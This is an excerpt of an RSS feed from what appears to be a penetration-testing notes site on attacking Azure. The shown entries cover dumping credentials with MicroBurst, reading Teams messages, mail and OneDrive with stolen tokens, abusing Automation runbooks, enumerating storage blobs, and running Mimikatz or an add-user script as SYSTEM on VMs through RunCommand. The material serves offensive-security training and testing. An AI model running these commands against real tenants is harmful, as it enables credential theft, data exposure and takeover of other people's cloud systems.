&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Microburst&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzurePasswords&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Microburst&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzurePasswords&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Out-GridView&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/"&gt;Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.alteredsecurity.com/azureadlab"&gt;Training - Attacking and Defending Azure Lab - Altered Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Azure Services - Microsoft Intune</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-microsoft-intune/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-microsoft-intune/</guid><description>&lt;p&gt;Microsoft Intune is a cloud-based service that provides mobile device management (MDM) and mobile application management (MAM). It allows organizations to control and secure access to corporate data on mobile devices, including smartphones, tablets, and PCs. With Intune, businesses can enforce security policies, manage apps, and ensure that devices comply with organizational requirements, whether they are company-owned or personal (BYOD).&lt;/p&gt;
&lt;h2 id="intunes-administration" class="anchored-heading"&gt;Intunes Administration&lt;a class="heading-anchor" href="#intunes-administration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Global Administrator&lt;/strong&gt; or &lt;strong&gt;Intune Administrator&lt;/strong&gt; Privilege&lt;/p&gt;</description></item><item><title>Azure Services - Office 365</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-office-365/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-office-365/</guid><description>&lt;h2 id="microsoft-teams-messages" class="anchored-heading"&gt;Microsoft Teams Messages&lt;a class="heading-anchor" href="#microsoft-teams-messages" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;TokenTacticsV2&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;RefreshTo-MSTeamsToken&lt;/span&gt; &lt;span class="n"&gt;-domain&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;AADInternals&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AADIntTeamsMessages&lt;/span&gt; &lt;span class="n"&gt;-AccessToken&lt;/span&gt; &lt;span class="nv"&gt;$MSTeamsToken&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;access_token&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Format-Table&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;deletiontime&lt;/span&gt;&lt;span class="p"&gt;,*&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;*,&lt;/span&gt;&lt;span class="n"&gt;DisplayName&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="outlook-mails" class="anchored-heading"&gt;Outlook Mails&lt;a class="heading-anchor" href="#outlook-mails" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Read user mails&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-MgUserMessage&lt;/span&gt; &lt;span class="n"&gt;-UserId&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;user-id&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;ft
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-MgUserMessageContent&lt;/span&gt; &lt;span class="n"&gt;-OutFile&lt;/span&gt; &lt;span class="n"&gt;mail&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt; &lt;span class="n"&gt;-UserId&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;user-id&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-MessageId&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;message-id&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="onedrive-files" class="anchored-heading"&gt;OneDrive Files&lt;a class="heading-anchor" href="#onedrive-files" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$userId&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;user-id&amp;gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Import-Module&lt;/span&gt; &lt;span class="n"&gt;Microsoft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Graph&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-MgUserDefaultDrive&lt;/span&gt; &lt;span class="n"&gt;-UserId&lt;/span&gt; &lt;span class="nv"&gt;$userId&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-MgUserDrive&lt;/span&gt; &lt;span class="n"&gt;-UserId&lt;/span&gt; &lt;span class="nv"&gt;$UserId&lt;/span&gt; &lt;span class="n"&gt;-Debug&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-MgDrive&lt;/span&gt; &lt;span class="n"&gt;-top&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/synacktiv/Mindmaps"&gt;Pentesting Azure Mindmap - Alexis Danizan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.alteredsecurity.com/azureadlab"&gt;Training - Attacking and Defending Azure Lab - Altered Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Azure Services - Runbook and Automation</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-runbook/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-runbook/</guid><description>&lt;h2 id="runbook" class="anchored-heading"&gt;Runbook&lt;a class="heading-anchor" href="#runbook" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Runbook must be &lt;strong&gt;SAVED&lt;/strong&gt; and &lt;strong&gt;PUBLISHED&lt;/strong&gt; before running it.&lt;/p&gt;
&lt;h3 id="list-the-runbooks" class="anchored-heading"&gt;List the Runbooks&lt;a class="heading-anchor" href="#list-the-runbooks" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-AzAutomationAccount&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Get-AzAutomationRunbook&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="create-a-runbook" class="anchored-heading"&gt;Create a Runbook&lt;a class="heading-anchor" href="#create-a-runbook" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Check user right for automation&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;extension&lt;/span&gt; &lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-upgrade&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="n"&gt;automation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;automation&lt;/span&gt; &lt;span class="n"&gt;account&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt; &lt;span class="c"&gt;# if it doesn&amp;#39;t return anything the user is not a part of an Automation group&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;ad&lt;/span&gt; &lt;span class="nb"&gt;signed-in&lt;/span&gt;&lt;span class="n"&gt;-user&lt;/span&gt; &lt;span class="nb"&gt;list-owned&lt;/span&gt;&lt;span class="n"&gt;-objects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Add the user to the &amp;ldquo;Automation&amp;rdquo; group: &lt;code&gt;Add-AzureADGroupMember -ObjectId &amp;lt;OBJID&amp;gt; -RefObjectId &amp;lt;REFOBJID&amp;gt; -Verbose&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Get the role of a user on the Automation account: &lt;code&gt;Get-AzRoleAssignment -Scope /subscriptions/&amp;lt;ID&amp;gt;/resourceGroups/&amp;lt;RG-NAME&amp;gt;/providers/Microsoft.Automation/automationAccounts/&amp;lt;AUTOMATION-ACCOUNT&amp;gt;&lt;/code&gt;. NOTE: Contributor or higher privileges accounts can create and execute Runbooks&lt;/p&gt;</description></item><item><title>Azure Services - Storage Blob</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-storage-blob/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-storage-blob/</guid><description>&lt;ul&gt;
&lt;li&gt;Blobs - &lt;code&gt;*.blob.core.windows.net&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;File Services - &lt;code&gt;*.file.core.windows.net&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Data Tables - &lt;code&gt;*.table.core.windows.net&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Queues - &lt;code&gt;*.queue.core.windows.net&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="enumerate-blobs" class="anchored-heading"&gt;Enumerate blobs&lt;a class="heading-anchor" href="#enumerate-blobs" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Tools&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;MicroBurst&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Misc&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;InvokeEnumerateAzureBlobs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Invoke-EnumerateAzureBlobs&lt;/span&gt; &lt;span class="n"&gt;-Base&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;SHORT&lt;/span&gt; &lt;span class="n"&gt;DOMAIN&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-OutputFile&lt;/span&gt; &lt;span class="n"&gt;azureblobs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Found&lt;/span&gt; &lt;span class="n"&gt;Storage&lt;/span&gt; &lt;span class="n"&gt;Account&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="n"&gt;redacted&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;blob&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;core&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;windows&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;net&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="list-and-download-blobs" class="anchored-heading"&gt;List and download blobs&lt;a class="heading-anchor" href="#list-and-download-blobs" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Visiting &lt;code&gt;https://&amp;lt;storage-name&amp;gt;.blob.core.windows.net/&amp;lt;storage-container&amp;gt;?restype=container&amp;amp;comp=list&lt;/code&gt; provides a JSON file containing a complete list of the Azure Blobs.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-xml" data-lang="xml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;&amp;lt;EnumerationResults&lt;/span&gt; &lt;span class="na"&gt;ContainerName=&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;https://&amp;lt;storage-name&amp;gt;.blob.core.windows.net/&amp;lt;storage-container&amp;gt;&amp;#34;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Blobs&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Blob&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Name&amp;gt;&lt;/span&gt;index.html&lt;span class="nt"&gt;&amp;lt;/Name&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Url&amp;gt;&lt;/span&gt;https://&lt;span class="nt"&gt;&amp;lt;storage-name&amp;gt;&lt;/span&gt;.blob.core.windows.net/&lt;span class="nt"&gt;&amp;lt;storage-container&amp;gt;&lt;/span&gt;/index.html&lt;span class="nt"&gt;&amp;lt;/Url&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Properties&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Last-Modified&amp;gt;&lt;/span&gt;Fri, 20 Oct 2023 20:08:20 GMT&lt;span class="nt"&gt;&amp;lt;/Last-Modified&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Etag&amp;gt;&lt;/span&gt;0x8DBD1A84E6455C0&lt;span class="nt"&gt;&amp;lt;/Etag&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Content-Length&amp;gt;&lt;/span&gt;782359&lt;span class="nt"&gt;&amp;lt;/Content-Length&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Content-Type&amp;gt;&lt;/span&gt;text/html&lt;span class="nt"&gt;&amp;lt;/Content-Type&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Content-Encoding/&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Content-Language/&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Content-MD5&amp;gt;&lt;/span&gt;JSe+sM+pXGAEFInxDgv4CA==&lt;span class="nt"&gt;&amp;lt;/Content-MD5&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Cache-Control/&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;BlobType&amp;gt;&lt;/span&gt;BlockBlob&lt;span class="nt"&gt;&amp;lt;/BlobType&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;LeaseStatus&amp;gt;&lt;/span&gt;unlocked&lt;span class="nt"&gt;&amp;lt;/LeaseStatus&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/Properties&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/Blob&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Browse deleted files.&lt;/p&gt;</description></item><item><title>Azure Services - Virtual Machine</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-virtual-machine/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-virtual-machine/</guid><description>&lt;h2 id="runcommand" class="anchored-heading"&gt;RunCommand&lt;a class="heading-anchor" href="#runcommand" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Allow anyone with &amp;ldquo;Contributor&amp;rdquo; rights to run PowerShell scripts on any Azure VM in a subscription as &lt;code&gt;NT Authority\System&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;: &lt;code&gt;Microsoft.Compute/virtualMachines/runCommand/action&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;List available Virtual Machines&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzureRmVM&lt;/span&gt; &lt;span class="n"&gt;-status&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;where &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;PowerState&lt;/span&gt; &lt;span class="o"&gt;-EQ&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;VM running&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;select &lt;/span&gt;&lt;span class="n"&gt;ResourceGroupName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;Name&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ResourceGroupName&lt;/span&gt; &lt;span class="n"&gt;Name&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;-----------------&lt;/span&gt; &lt;span class="p"&gt;----&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;TESTRESOURCES&lt;/span&gt; &lt;span class="nb"&gt;Remote-Test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Get Public IP of VM by querying the network interface&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;AzureAD&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzVM&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;RESOURCE&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-ResourceGroupName&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;RG-NAME&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;select &lt;/span&gt;&lt;span class="n"&gt;-ExpandProperty&lt;/span&gt; &lt;span class="n"&gt;NetworkProfile&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;AzureAD&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzNetworkInterface&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;RESOURCE368&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;AzureAD&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzPublicIpAddress&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;RESOURCEIP&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Execute Powershell script on the VM, like &lt;code&gt;adduser&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;AzureAD&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Invoke-AzVMRunCommand&lt;/span&gt; &lt;span class="n"&gt;-VMName&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;RESOURCE&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-ResourceGroupName&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;RG-NAME&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-CommandId&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;RunPowerShellScript&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-ScriptPath&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;C:\Tools\adduser.ps1&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Azure&lt;/span&gt; &lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Invoke-AzureRmVMRunCommand&lt;/span&gt; &lt;span class="n"&gt;-ResourceGroupName&lt;/span&gt; &lt;span class="n"&gt;TESTRESOURCES&lt;/span&gt; &lt;span class="n"&gt;-VMName&lt;/span&gt; &lt;span class="nb"&gt;Remote-Test&lt;/span&gt; &lt;span class="n"&gt;-CommandId&lt;/span&gt; &lt;span class="n"&gt;RunPowerShellScript&lt;/span&gt; &lt;span class="n"&gt;-ScriptPath&lt;/span&gt; &lt;span class="n"&gt;Mimikatz&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
